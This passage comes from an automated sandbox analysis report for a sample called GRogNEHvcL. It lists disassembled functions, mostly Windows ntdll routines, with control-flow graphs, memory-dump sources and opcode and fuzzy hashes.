                                            • Associated: 0000000E.00000002.2398166296.0000000001B29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_1a00000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: c42d4cd38b20aaf90cadb5febd0175b8a405279046ed9e676ec1a67da3a4c1cb
                                            • Instruction ID: 5f5cf9f704e63ea6194c4a65168724701f25d2a7774b63bd55edb280ef1a3a27
                                            • Opcode Fuzzy Hash: c42d4cd38b20aaf90cadb5febd0175b8a405279046ed9e676ec1a67da3a4c1cb
                                            • Instruction Fuzzy Hash: C4B09B719015C5C5DA11F7644A08717B90577D0701F56C072D3030645F473CC5D1E275
                                            Function 01A72DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 5 1a72df0-1a72dfc LdrInitializeThunk
                                            APIs
                                            • LdrInitializeThunk.NTDLL(01AAE73E,0000005A,01B0D040,00000020,00000000,01B0D040,00000080,01A94A81,00000000,-00000001,-00000001,00000002,00000000,?,-00000001,01A7AE00), ref: 01A72DFA
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2398166296.0000000001A26000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                            • Associated: 0000000E.00000002.2398166296.0000000001A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001A07000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001A80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001A86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001AC2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001B23000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001B29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_1a00000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 29bfb9e096d7b612a9e27e61d8deb0406608cf5d8914283bbe800f157b77b23f
                                            • Instruction ID: d664bdb7ec0bd7c758d481bd417416d6cd8e2bb63218bac346e4581aee4ed9bb
                                            • Opcode Fuzzy Hash: 29bfb9e096d7b612a9e27e61d8deb0406608cf5d8914283bbe800f157b77b23f
                                            • Instruction Fuzzy Hash: A490023120140413D11171584544707900A97D0341FD6C412A042455CDDA5A8A52A221
                                            Function 01A72C1D Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 4 1a72c1d-1a72c26 LdrInitializeThunk
                                            APIs
                                            • LdrInitializeThunk.NTDLL(01A8FD4F,000000FF,00000024,01B26634,00000004,00000000,?,-00000018,7D810F61,?,?,01A48B12,?,?,?,?), ref: 01A72C24
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2398166296.0000000001A26000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                            • Associated: 0000000E.00000002.2398166296.0000000001A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001A07000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001A80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001A86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001AC2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001B23000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001B29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_1a00000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 506a2b8f84921b937879bccfd044651c921dc2542b09baf7c993429ef30b68ae
                                            • Instruction ID: eb6be8009c1abe54b40ed2d7d5c5e5adb42552787578b613af7fb8371b3530ef
                                            • Opcode Fuzzy Hash: 506a2b8f84921b937879bccfd044651c921dc2542b09baf7c993429ef30b68ae
                                            • Instruction Fuzzy Hash: FCA002351992D4045601AA6404147D52F148AA1745746D445E5D27041B87120552B971
                                            Function 01A735C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 6 1a735c0-1a735cc LdrInitializeThunk
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2398166296.0000000001A26000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                            • Associated: 0000000E.00000002.2398166296.0000000001A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001A07000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001A80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001A86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001AC2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001B23000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001B29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_1a00000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: f4917dadc3cfcc6c4ee4f5abcd66be0397ae1058d41f53f40a57c5cd9b675ad7
                                            • Instruction ID: eb552fdd4cc7d6aae4a1e21c8f5fd362416ee8965cf9538c1d883c1145cec495
                                            • Opcode Fuzzy Hash: f4917dadc3cfcc6c4ee4f5abcd66be0397ae1058d41f53f40a57c5cd9b675ad7
                                            • Instruction Fuzzy Hash: 5490023160550402D10071584554706A00697D0301FA6C411A042456CDCB998A5166A2
                                            Function 0042CF3D Relevance: .1, Instructions: 53COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 7 42cf3d-42cf3e 8 42cf40 7->8 9 42cf26-42cf35 7->9 10 42cf42-42cf71 8->10 11 42cef6-42cf1e 8->11 15 42cf73-42cf76 10->15 16 42cf77-42cf81 10->16 13 42cf24 11->13 13->9
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2397807471.000000000042C000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042C000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_42c000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: de57d7b275d78625657a917f8e15bc2498b9f14b1da8dcb65946c1b8146471d9
                                            • Instruction ID: 18cffacd227d4a6d2d988aebb948c070e03c2f836fe31cb2e2252cb2bf8d81e3
                                            • Opcode Fuzzy Hash: de57d7b275d78625657a917f8e15bc2498b9f14b1da8dcb65946c1b8146471d9
                                            • Instruction Fuzzy Hash: 511109B2610209AFDB04DF59DD85EEB73A9FB88310F44855AFD18C7241E774E9208BA4
                                            Function 0042CB6F Relevance: .0, Instructions: 42COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 17 42cb6f-42cb8a 18 42cb99-42cba0 17->18 19 42cbaf-42cbb4 18->19 20 42cc03-42cc08 19->20 21 42cbb6-42cbbf 19->21 22 42cbce-42cbd3 21->22 23 42cbe6-42cc00 22->23 24 42cbd5-42cbdd 22->24 23->20 25 42cbe3 24->25 25->23
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2397807471.000000000042C000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042C000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_42c000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ae1821fd4de9c8e484283ed563e505c3bac67b0a137414ee1eb184a9f433d1ea
                                            • Instruction ID: 9fc0d30178ef2b6f2fea693294ff6623409e71b0255f33dd5ad3e4128b2e2ca7
                                            • Opcode Fuzzy Hash: ae1821fd4de9c8e484283ed563e505c3bac67b0a137414ee1eb184a9f433d1ea
                                            • Instruction Fuzzy Hash: 5701F7B1E4821C55EB60EB649D42FD977749F15304F4043EAA50CA1283EF3856DC8BE5
                                            Function 0042CB73 Relevance: .0, Instructions: 41COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 28 42cb73-42cbb4 31 42cc03-42cc08 28->31 32 42cbb6-42cbd3 28->32 34 42cbe6-42cc00 32->34 35 42cbd5-42cbdd 32->35 34->31 36 42cbe3 35->36 36->34
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2397807471.000000000042C000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042C000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_42c000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c2eafe1b73795a7f485c20a38b826dd127f0d4094a4c2f89c60cd3062268fc4b
                                            • Instruction ID: d8a7eb4104c7e48900439b328dbfc277fc3fe284d9eff41b2dac9889a1fba086
                                            • Opcode Fuzzy Hash: c2eafe1b73795a7f485c20a38b826dd127f0d4094a4c2f89c60cd3062268fc4b
                                            • Instruction Fuzzy Hash: C9012BB1E4821C56EB60EB649D42FD973B89F05304F4042DAA50CA1283FF7856CC8BE5
                                            Function 0042CEEA Relevance: .0, Instructions: 34COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 39 42ceea-42cef4 41 42cef6-42cf1e 39->41 42 42cf24-42cf35 41->42
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2397807471.000000000042C000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042C000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_42c000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 36187db486f59d4d9860a5b4bc659c19c102e0cb60cb30ee9cade4fed8f16b54
                                            • Instruction ID: c071ede7ca2c684ae446fa24df6dce67e8ef8a443a45107448b2fc0b5140a641
                                            • Opcode Fuzzy Hash: 36187db486f59d4d9860a5b4bc659c19c102e0cb60cb30ee9cade4fed8f16b54
                                            • Instruction Fuzzy Hash: CDF01D72610209AFCB04CF55C885EEA73A9EB48350F04C219FD1987241D774E521CBA4
                                            Function 0042CEF3 Relevance: .0, Instructions: 28COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 44 42cef3-42cef4 45 42cef6-42cf1e 44->45 46 42cf24-42cf35 45->46
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2397807471.000000000042C000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042C000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_42c000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 018e25cbd8f62bf225f17d12c7aeb52c287a09702847bbb4445d18a4c0210741
                                            • Instruction ID: 01263ab2a62888b7cca090e89be2d5a7e477e75796abff4c3780228cb79304c3
                                            • Opcode Fuzzy Hash: 018e25cbd8f62bf225f17d12c7aeb52c287a09702847bbb4445d18a4c0210741
                                            • Instruction Fuzzy Hash: 10F0F872610209AFCB04CF59C885EEB73A9FB88750F04C559BD288B241D774EA108BA4
                                            Function 0042CF83 Relevance: .0, Instructions: 13COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 48 42cf83-42cf96 49 42cf9c-42cfa0 48->49
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2397807471.000000000042C000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042C000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_42c000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 246417e84a5808270f4f825cdd82419e50382e55cd09f7aea8684077e1a2e479
                                            • Instruction ID: e04a1d9d0b77ff6c90ccb246db8e603ca239e9d7dd24a533910a5724f0e35aea
                                            • Opcode Fuzzy Hash: 246417e84a5808270f4f825cdd82419e50382e55cd09f7aea8684077e1a2e479
                                            • Instruction Fuzzy Hash: 5DC012B16003086BD704EA89DC46F6533DC9708614F458455B90C8B242D571B9104794

                                            Non-executed Functions

                                            Function 01A74A80 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 51timeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 50 1a74a80-1a74a8b 51 1a74a9f-1a74aa6 50->51 52 1a74a8d-1a74a99 RtlDebugPrintTimes 50->52 53 1a74aaf-1a74ab6 call 1a5f5a0 51->53 54 1a74aa8-1a74aae 51->54 52->51 57 1a74b25-1a74b26 52->57 59 1a74b23 53->59 60 1a74ab8-1a74b22 call 1a61e46 * 2 53->60 59->57 60->59
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2398166296.0000000001A26000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                            • Associated: 0000000E.00000002.2398166296.0000000001A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001A07000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001A80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001A86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001AC2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001B23000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001B29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_1a00000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: 0Iv$0Iv$0Iv$0Iv$0Iv$0Iv
                                            • API String ID: 3446177414-2083360775
                                            • Opcode ID: 1f57fa0519d0c9e0acad00663620d5ea8d351a5f8af3d9e748cf17946124922f
                                            • Instruction ID: 3bcd1823b737d1647895ef9b9395b9a00879a6efcc178d62e592260f09a332ed
                                            • Opcode Fuzzy Hash: 1f57fa0519d0c9e0acad00663620d5ea8d351a5f8af3d9e748cf17946124922f
                                            • Instruction Fuzzy Hash: 8A01B132E042786AE7349F2ABC04B872B91B7CDB29F25019AE90C8B288D7744D49D394
                                            Function 01A72890 Relevance: 9.2, APIs: 6, Instructions: 190COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 261 1a72890-1a728b3 262 1aaa4bc-1aaa4c0 261->262 263 1a728b9-1a728cc 261->263 262->263 266 1aaa4c6-1aaa4ca 262->266 264 1a728ce-1a728d7 263->264 265 1a728dd-1a728df 263->265 264->265 268 1aaa57e-1aaa585 264->268 269 1a728e1-1a728e5 265->269 266->263 267 1aaa4d0-1aaa4d4 266->267 267->263 270 1aaa4da-1aaa4de 267->270 268->265 271 1a728eb-1a728fa 269->271 272 1a72988-1a7298e 269->272 270->263 273 1aaa4e4-1aaa4eb 270->273 274 1aaa58a-1aaa58d 271->274 275 1a72900-1a72905 271->275 276 1a72908-1a7290c 272->276 277 1aaa4ed-1aaa4f4 273->277 278 1aaa564-1aaa56c 273->278 274->276 275->276 276->269 279 1a7290e-1a7291b 276->279 280 1aaa50b 277->280 281 1aaa4f6-1aaa4fe 277->281 278->263 284 1aaa572-1aaa576 278->284 282 1a72921 279->282 283 1aaa592-1aaa599 279->283 287 1aaa510-1aaa536 call 1a80050 280->287 281->263 286 1aaa504-1aaa509 281->286 288 1a72924-1a72926 282->288 290 1aaa5a1-1aaa5c9 call 1a80050 283->290 284->263 285 1aaa57c call 1a80050 284->285 302 1aaa55d-1aaa55f 285->302 286->287 287->302 292 1a72993-1a72995 288->292 293 1a72928-1a7292a 288->293 292->293 297 1a72997-1a729b1 call 1a80050 292->297 298 1a72946-1a72966 call 1a80050 293->298 299 1a7292c-1a7292e 293->299 311 1a72969-1a72974 297->311 298->311 299->298 305 1a72930-1a72944 call 1a80050 299->305 309 1a72981-1a72985 302->309 305->298 311->288 312 1a72976-1a72979 311->312 312->290 313 1a7297f 312->313 313->309
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2398166296.0000000001A26000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                            • Associated: 0000000E.00000002.2398166296.0000000001A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001A07000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001A80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001A86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001AC2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001B23000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001B29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_1a00000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID:
                                            • API String ID: 48624451-0
                                            • Opcode ID: 5e3cd32e2883f3e781b0b95687b25a561a15e9367f7e86953c62e4069d6db0b6
                                            • Instruction ID: 7c21d6822d236131b9913913ef5a0dfbf250e4b4edfd2c9a628b0870a7658dca
                                            • Opcode Fuzzy Hash: 5e3cd32e2883f3e781b0b95687b25a561a15e9367f7e86953c62e4069d6db0b6
                                            • Instruction Fuzzy Hash: 7951B7B5A00117BFDB11DBAD8D90A7EFBF8BB48240B54816AE495D7641D334DF44CBA0
                                            Function 01A4A250 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 404COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 314 1a4a250-1a4a26f 315 1a4a275-1a4a291 314->315 316 1a4a58d-1a4a594 314->316 317 1a4a297-1a4a2a0 315->317 318 1a979e6-1a979eb 315->318 316->315 319 1a4a59a-1a979bb 316->319 317->318 320 1a4a2a6-1a4a2ac 317->320 319->315 324 1a979c1-1a979c6 319->324 322 1a4a2b2-1a4a2b4 320->322 323 1a4a6ba-1a4a6bc 320->323 322->318 326 1a4a2ba-1a4a2bd 322->326 325 1a4a6c2 323->325 323->326 327 1a4a473-1a4a479 324->327 328 1a4a2c3-1a4a2c6 325->328 326->318 326->328 329 1a4a2c8-1a4a2d1 328->329 330 1a4a2da-1a4a2dd 328->330 331 1a979cb-1a979d5 329->331 332 1a4a2d7 329->332 333 1a4a6c7-1a4a6d0 330->333 334 1a4a2e3-1a4a32b 330->334 336 1a979da-1a979e3 call 1abf290 331->336 332->330 333->334 335 1a4a6d6-1a979ff 333->335 337 1a4a330-1a4a335 334->337 335->336 336->318 340 1a4a47c-1a4a47f 337->340 341 1a4a33b-1a4a343 337->341 342 1a4a485-1a4a488 340->342 343 1a4a34f-1a4a35d 340->343 341->343 345 1a4a345-1a4a349 341->345 346 1a4a48e-1a4a49e 342->346 347 1a97a16-1a97a19 342->347 343->346 349 1a4a363-1a4a368 343->349 345->343 348 1a4a59f-1a4a5a8 345->348 346->347 352 1a4a4a4-1a4a4ad 346->352 350 1a4a36c-1a4a36e 347->350 351 1a97a1f-1a97a24 347->351 353 1a4a5c0-1a4a5c3 348->353 354 1a4a5aa-1a4a5ac 348->354 349->350 355 1a4a374-1a4a38c call 1a4a6e0 350->355 356 1a97a26 350->356 357 1a97a2b 351->357 352->350 359 1a97a01 353->359 360 1a4a5c9-1a4a5cc 353->360 354->343 358 1a4a5b2-1a4a5bb 354->358 367 1a4a4b2-1a4a4b9 355->367 368 1a4a392-1a4a3ba 355->368 356->357 364 1a97a2d-1a97a2f 357->364 358->350 361 1a97a0c 359->361 360->361 362 1a4a5d2-1a4a5d5 360->362 361->347 362->354 364->327 366 1a97a35 364->366 369 1a4a3bc-1a4a3be 367->369 370 1a4a4bf-1a4a4c2 367->370 368->369 369->364 371 1a4a3c4-1a4a3cb 369->371 370->369 372 1a4a4c8-1a4a4d3 370->372 373 1a4a3d1-1a4a3d4 371->373 374 1a97ae0 371->374 372->337 375 1a4a3e0-1a4a3ea 373->375 376 1a97ae4-1a97afc call 1abf290 374->376 375->376 377 1a4a3f0-1a4a40c call 1a4a840 375->377 376->327 382 1a4a5d7-1a4a5e0 377->382 383 1a4a412-1a4a417 377->383 384 1a4a601-1a4a603 382->384 385 1a4a5e2-1a4a5eb 382->385 383->327 386 1a4a419-1a4a43d 383->386 388 1a4a605-1a4a623 call 1a34508 384->388 389 1a4a629-1a4a631 384->389 385->384 387 1a4a5ed-1a4a5f1 385->387 390 1a4a440-1a4a443 386->390 391 1a4a5f7-1a4a5fb 387->391 392 1a4a681-1a4a6ab RtlDebugPrintTimes 387->392 388->327 388->389 394 1a4a4d8-1a4a4dc 390->394 395 1a4a449-1a4a44c 390->395 391->384 391->392 392->384 408 1a4a6b1-1a4a6b5 392->408 399 1a97a3a-1a97a42 394->399 400 1a4a4e2-1a4a4e5 394->400 397 1a4a452-1a4a454 395->397 398 1a97ad6 395->398 404 1a4a520-1a4a539 call 1a4a6e0 397->404 405 1a4a45a-1a4a461 397->405 398->374 402 1a4a634-1a4a64a 399->402 403 1a97a48-1a97a4c 399->403 400->402 406 1a4a4eb-1a4a4ee 400->406 409 1a4a4f4-1a4a50c 402->409 410 1a4a650-1a4a659 402->410 403->402 411 1a97a52-1a97a5b 403->411 420 1a4a65e-1a4a665 404->420 421 1a4a53f-1a4a567 404->421 412 1a4a467-1a4a46c 405->412 413 1a4a57b-1a4a582 405->413 406->395 406->409 408->384 409->395 419 1a4a512-1a4a51b 409->419 410->397 416 1a97a5d-1a97a60 411->416 417 1a97a85-1a97a87 411->417 412->327 418 1a4a46e 412->418 413->375 415 1a4a588 413->415 415->374 423 1a97a6e-1a97a71 416->423 424 1a97a62-1a97a6c 416->424 417->402 422 1a97a8d-1a97a96 417->422 418->327 419->397 425 1a4a569-1a4a56b 420->425 426 1a4a66b-1a4a66e 420->426 421->425 422->397 428 1a97a7e 423->428 429 1a97a73-1a97a7c 423->429 427 1a97a81 424->427 425->412 430 1a4a571-1a4a573 425->430 426->425 431 1a4a674-1a4a67c 426->431 427->417 428->427 429->422 432 1a97a9b-1a97aa4 430->432 433 1a4a579 430->433 431->390 432->433 434 1a97aaa-1a97ab0 432->434 433->413 434->433 435 1a97ab6-1a97abe 434->435 435->433 436 1a97ac4-1a97acf 435->436 436->435 437 1a97ad1 436->437 437->433
                                            Strings
                                            • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 01A979D5
                                            • SsHd, xrefs: 01A4A3E4
                                            • RtlpFindActivationContextSection_CheckParameters, xrefs: 01A979D0, 01A979F5
                                            • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 01A979FA
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2398166296.0000000001A26000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                            • Associated: 0000000E.00000002.2398166296.0000000001A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001A07000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001A80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001A86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001AC2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001B23000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001B29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_1a00000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                            • API String ID: 0-929470617
                                            • Opcode ID: 8dafe867aa27c0610bb1c951cb21fff20452b1f4aad8b76738aa26ab62c0b4af
                                            • Instruction ID: 36c2fad7af76fe1d4f597028bc8524c06c659c4b7d9c91d2d9bb5736288b448e
                                            • Opcode Fuzzy Hash: 8dafe867aa27c0610bb1c951cb21fff20452b1f4aad8b76738aa26ab62c0b4af
                                            • Instruction Fuzzy Hash: 3BE1D5716443018FEB25CF68C984B6ABBE1BBC4314F184A2DF957CB291D731E985CB92
                                            Function 01A4D770 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 372timeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 438 1a4d770-1a4d7ab 439 1a4d9e7-1a4d9ee 438->439 440 1a4d7b1-1a4d7bb 438->440 439->440 443 1a4d9f4-1a9932c 439->443 441 1a4d7c1-1a4d7ca 440->441 442 1a99357 440->442 441->442 445 1a4d7d0-1a4d7d3 441->445 449 1a99361-1a99370 442->449 443->440 448 1a99332-1a99337 443->448 446 1a4d7d9-1a4d7db 445->446 447 1a4d9da-1a4d9dc 445->447 446->442 450 1a4d7e1-1a4d7e4 446->450 447->450 452 1a4d9e2 447->452 451 1a4d927-1a4d938 call 1a74c30 448->451 453 1a9934b-1a99354 call 1abf290 449->453 450->442 454 1a4d7ea-1a4d7ed 450->454 452->454 453->442 457 1a4d7f3-1a4d7f6 454->457 458 1a4d9f9-1a4da02 454->458 462 1a4d7fc-1a4d848 call 1a4d660 457->462 463 1a4da0d-1a4da16 457->463 458->457 461 1a4da08-1a99346 458->461 461->453 462->451 468 1a4d84e-1a4d852 462->468 463->462 465 1a4da1c 463->465 465->449 468->451 469 1a4d858-1a4d85f 468->469 470 1a4d865-1a4d869 469->470 471 1a4d9d1-1a4d9d5 469->471 473 1a4d870-1a4d87a 470->473 472 1a99563-1a9957b call 1abf290 471->472 472->451 473->472 474 1a4d880-1a4d887 473->474 476 1a4d8ed-1a4d90d 474->476 477 1a4d889-1a4d88d 474->477 481 1a4d910-1a4d913 476->481 479 1a4d893-1a4d898 477->479 480 1a99372 477->480 482 1a99379-1a9937b 479->482 483 1a4d89e-1a4d8a5 479->483 480->482 484 1a4d915-1a4d918 481->484 485 1a4d93b-1a4d940 481->485 482->483 488 1a99381-1a993aa 482->488 489 1a993ea-1a993ed 483->489 490 1a4d8ab-1a4d8e3 call 1a78250 483->490 491 1a99559-1a9955e 484->491 492 1a4d91e-1a4d920 484->492 486 1a4d946-1a4d949 485->486 487 1a994d3-1a994db 485->487 493 1a4da21-1a4da2f 486->493 494 1a4d94f-1a4d952 486->494 487->493 495 1a994e1-1a994e5 487->495 488->476 496 1a993b0-1a993ca call 1a882c0 488->496 498 1a993f1-1a99400 call 1a882c0 489->498 512 1a4d8e5-1a4d8e7 490->512 491->451 499 1a4d971-1a4d98c call 1a4a6e0 492->499 500 1a4d922 492->500 501 1a4d954-1a4d964 493->501 504 1a4da35-1a4da3e 493->504 494->484 494->501 495->493 502 1a994eb-1a994f4 495->502 496->512 517 1a993d0-1a993e3 496->517 522 1a99402-1a99410 498->522 523 1a99417 498->523 519 1a99528-1a9952d 499->519 520 1a4d992-1a4d9ba 499->520 500->451 501->484 508 1a4d966-1a4d96f 501->508 509 1a99512-1a99514 502->509 510 1a994f6-1a994f9 502->510 504->492 508->492 509->493 521 1a9951a-1a99523 509->521 515 1a994fb-1a99501 510->515 516 1a99503-1a99506 510->516 512->476 518 1a99420-1a99424 512->518 515->509 525 1a99508-1a9950d 516->525 526 